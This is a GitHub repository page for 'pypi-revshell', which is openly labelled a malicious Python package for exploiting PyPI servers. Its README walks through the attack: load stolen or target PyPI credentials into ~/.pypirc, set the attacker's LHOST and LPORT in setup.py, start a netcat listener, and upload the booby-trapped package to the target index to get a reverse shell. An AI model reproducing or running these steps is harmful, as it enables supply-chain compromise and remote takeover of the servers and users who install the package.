Skip to content
/ pypi-revshell Public

Malicious Python package for PyPi server exploitation

License

MIT license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

iamkashz/pypi-revshell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
pypi-revshell
pypi-revshell
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
setup.cfg
setup.cfg
 
 
setup.py
setup.py
 
 

Repository files navigation

pypi-revshell

Malicious Python package for PyPi server exploitation

Create ~/.pypirc with the target PyPi creds

https://pypi.org/project/pypiserver/#upload-with-setuptools

Using setuptools:

git clone https://github.com/iamkashz/pypi-revshell.git
cd pypi-revshell
# modify LHOST, LPORT in setup.py

# to confirm package creation
python setup.py sdist
# should create tar archive under dist/pypi-revshell-0.1.tar.gz

# start listener using 
nc -lvnp LPORT

# uplood package to target
python setup.py sdist upload -r [remote-index-server]

References

About

Malicious Python package for PyPi server exploitation

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages